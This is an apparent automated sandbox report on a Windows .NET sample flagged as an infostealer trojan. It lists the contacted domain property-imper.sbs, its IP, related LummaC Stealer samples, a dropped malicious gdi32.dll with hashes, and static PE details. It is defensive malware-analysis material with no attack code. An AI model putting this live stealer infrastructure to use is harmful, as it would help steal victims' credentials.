https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752555209.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731925618.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752661147.0000000004C45000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752555209.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731925618.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752661147.0000000004C45000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/	aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/l	aspnet_regiis.exe, 00000002.00000003.1878990637.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	aspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C20000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/U	aspnet_regiis.exe, 00000002.00000003.1878990637.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C20000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/BW#?06	aspnet_regiis.exe, 00000002.00000003.1878990637.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/api;	aspnet_regiis.exe, 00000002.00000003.1879281479.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1879487275.00000000006FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.33.116	property-imper.sbs	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561496
Start date and time:	2024-11-23 15:09:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	S#U043eftWare.exe renamed because original name is a hash value
Original Sample Name:	SftWare.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/7@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 76% Number of executed functions: 20 Number of non-executed functions: 50
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: S#U043eftWare.exe

Simulations

Behavior and APIs

Time	Type	Description
09:10:01	API Interceptor	8x Sleep call for process: aspnet_regiis.exe modified
09:10:28	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.33.116	Call 0f Duty A1 Launcher.exe	Get hash	malicious	LummaC Stealer	Browse
	Aura.exe	Get hash	malicious	Unknown	Browse
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	Script.exe	Get hash	malicious	LummaC Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
property-imper.sbs	Call 0f Duty A1 Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	Aura.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Call 0f Duty A1 Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	arcaneloader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140
	unturnedHack.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	Unknown	Browse	104.21.70.128
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	xLauncher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.61
	Aura.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	injector V2.5.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Call 0f Duty A1 Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	arcaneloader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	xLauncher.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	Aura.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	injector V2.5.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_S#U043eftWare.ex_c2eb22ee7582ddf93e8b655d587659adbaca8199_849bd03d_511f84fa-aed9-4bd6-a9fe-1d9ee9ac4087\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9898611254275596
Encrypted:	false
SSDEEP:	192:P7taEKfQZkd0BU/KaGpezuiFNZ24IO8V7:jtaEKo2eBU/KahzuiFNY4IO8V
MD5:	76A1DE94EFE9C66F7E2BBAEEF99A3C1D
SHA1:	E8DCC47A6CF618BF44A7802D3DE30DB3A90D8E6C
SHA-256:	4892BA9CA99ACAB40D70D26969CDB23D6E140079CFA121AF354A30D90642E0D8
SHA-512:	E10DC683EB326555705744C76596B0546D430F9D6590E77F8C4ED5612E784F01D86DF2A0C3502FFD69A15B8520CD9EC79AE71A180C67F362BC105F11EDF5FF13
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.4.4.5.9.9.0.1.2.7.2.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.4.4.5.9.9.5.4.3.9.8.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.1.1.f.8.4.f.a.-.a.e.d.9.-.4.b.d.6.-.a.9.f.e.-.1.d.9.e.e.9.a.c.4.0.8.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.d.2.9.3.3.4.-.2.2.a.6.-.4.f.0.b.-.9.e.2.3.-.9.6.9.3.3.b.3.6.c.b.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.#.U.0.4.3.e.f.t.W.a.r.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.X.e.n.i.a.R.u.b.y.E.l.e.a.n.o.r...f.I.M.m.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.c.8.-.0.0.0.1.-.0.0.1.4.-.b.7.b.b.-.b.7.6.0.b.1.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.f.5.e.9.4.7.3.d.b.2.6.e.5.d.d.8.0.0.f.7.8.0.b.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER87AC.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Nov 23 14:09:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	191160
Entropy (8bit):	3.4283943147095934
Encrypted:	false
SSDEEP:	1536:oPQjFpN4uE2aOtZxAYLTgTDFRCuO4ADCDTZEzNUV:oPs54uEqtHAYLTg/F0uOgtEB
MD5:	3345189ABEC6911F7D5524C57EE97770
SHA1:	F3F7C3A850B4143BCCBCA8C3D299F4240A0B23D3
SHA-256:	6CA44176FE24004933A8D0AD3CCDBF9D81CA9BBE7F55F2092EBF926D6E7C4D0C
SHA-512:	CDF32F9B78FB2C922537511CA492429FF25B8CD7E2A5CFC2E961EC446B6472A92C66D0DE0D6E3FCA456DFC1F1AAD6A368539244CC350E96EFE05B2672282F1B1
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......7.Ag............D...............X.......$................J..........`.......8...........T...........00..............,............ ..............................................................................eJ....... ......GenuineIntel............T...........5.Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER88B7.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8434
Entropy (8bit):	3.7045973995476396
Encrypted:	false
SSDEEP:	192:R6l7wVeJ6S6d6Y9pSU2Wy0gmfZ3YPdprr89b3wsfJdm:R6lXJf6d6YjSUJBgmfJYU3DfK
MD5:	6E53741D3A5BC0244C7F95A53EF648C7
SHA1:	6D0C65B606751E3C819AA5AB7ADDD81B1C0CB836
SHA-256:	76E18F256F9C412C9035A519F8A51EADCFF6D9E84918CAF5D358CCE07C268CDC
SHA-512:	A70861BB8D7572C04337A90AB4726FF1EC81360376B25144BC21784518A1102EB9E3243CF1C3344923E1F7F4EFBD9C60E1E87EAB1B544C0BFF3F1F3B0F55752E
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER88D7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4799
Entropy (8bit):	4.535455551350094
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9LjEWpW8VYRYm8M4Jo2FVX+q8v4p3nyNnl5Ud:uIjfEI7dd7VhJtKy3u5Ud
MD5:	CD544203E8E5F5A5E838BC5D47E6D0CB
SHA1:	9CC240C8A4B4AC6738A3457BD6B396253E1C9F76
SHA-256:	F51DB96EE6CC861FD798CA667A3736B7E72F5CAD2C5295C44E07917463AB0D37
SHA-512:	5E0058DD7FB129EFAB49463DDB19FE871955CF11707DAB14FBCED64D33BAE4E5B3C28E40727BD74E7EC65CB2FB121B356E1A0D7F5CE375E68FF16AD813240D91
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600792" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\gdi32.dll

Download File

Process:	C:\Users\user\Desktop\S#U043eftWare.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	454144
Entropy (8bit):	7.119056743566476
Encrypted:	false
SSDEEP:	12288:iN1LbUQPhvt/au1HprNUd0eS1xrNWRym1maND2q4R3xJvS3sMGTyLWmRcwWByNZF:iN10QPD/au1HprNUd0eS1xrNWRym1maU
MD5:	68EDC35FED02EDABDE88782166A49CCA
SHA1:	4E6ECF76FC091070E3705C9D4E8769109DB8D862
SHA-256:	2CF8796216C2968E679698CCE0D7470B12BD16EEE6F3BFD7DC2BA2AB163E4B80
SHA-512:	F28039DD6BBDD01C81CB65FB9E371894317D93FE5F16EC919402EBF1538B908067EE5285E61C2BF455479936522C4EC19440DB8DA9D68F497CB898DE7310043A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L.....Ag...........!.........P............................................... ............@.............................\|.......P...............................`...\...............................x...@...............T............................text.............................. ..`.rdata...\.......^..................@..@.data........ ......................@....reloc..`...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466090389373905
Encrypted:	false
SSDEEP:	6144:MIXfpi67eLPU9skLmb0b4QWSPKaJG8nAgejZMMhA2gX4WABl0uNMdwBCswSbNp:xXD94QWlLZMM6YFHC+Np
MD5:	77D8F1EC2D0184CF6054B6F833149AAB
SHA1:	283F0688574EE80761C3236194928A3CFAED99E7
SHA-256:	A7342034DA03D36DA8E49970CBAF07541C4FDE133F4A3476CD84A614C7173835
SHA-512:	037215770DCBAC5B75A7AEB69BDDC7A89B1E7D668646835B08BB308C594EE9BA6048E8214604C3D37D390612B1DF6F5502FD3A2EE793C38162EA9B527417D7AE
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Xa.=...............................................................................................................................................................................................................................................................................................................................................9OU........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\S#U043eftWare.exe
File Type:	ASCII text, with very long lines (352), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1413
Entropy (8bit):	4.534597972445573
Encrypted:	false
SSDEEP:	24:7v74NuUMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4ZMff2p8p14nrPKktp
MD5:	C7192E00B6554D10CE1622A1C93BBEC7
SHA1:	0443E59CDBA53D4E84A5130C0EB48D5F36967382
SHA-256:	0FF48E386C976BA10A6AB7CA6FB93A7278F97DF57FB7D9A01EABDCFAB3641077
SHA-512:	9A849C1A402D5C86D3B69AD58010CF1FAD088A40CBCC9F882ADD4286FBC110A7B1AB6AFF5B2C4BEA59EEF3FABCBFDBB45E7649C974355F25ED87C9F879B811E3
Malicious:	false
Reputation:	low
Preview:	.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "XeniaRubyEleanor" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetStri

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.76085746804744
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	S#U043eftWare.exe
File size:	707'072 bytes
MD5:	82c56f5e8dcae969405b4f02be0d785a
SHA1:	f5e9473db26e5dd800f780b02ccf15e7a66d0d48
SHA256:	d37859bc3d96d9dd1304fcb56a9e7225a31fa922e7b4945e7bb18e79fa09256c
SHA512:	4a1cf38e79d0963f15e07d7be8fb123ead007bf0e0b3d71aab74710e8cb1d80ef7e308d9d2f82f93dc9f0b2e6c7c6775b6c162ae8f86f4e7b23b5cafaa6024fa
SSDEEP:	12288:8OMZutCCSy9u5Igbmxj/0e0kfK3bCKoGjTGFcTwFOVT50mc4w67pUnO+IQlmIOE/:8OKSRzh0e0UK3+0TOOVTmmc4+
TLSH:	38E47CDC726072DFC867D472DEA81CA8FA91747B931B4213942706EDAA1D897CF190F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag..............0..............@....... ....@.. .......................`............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4b400a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6741CBEF [Sat Nov 23 12:34:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004B4000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x90750	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0x648	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
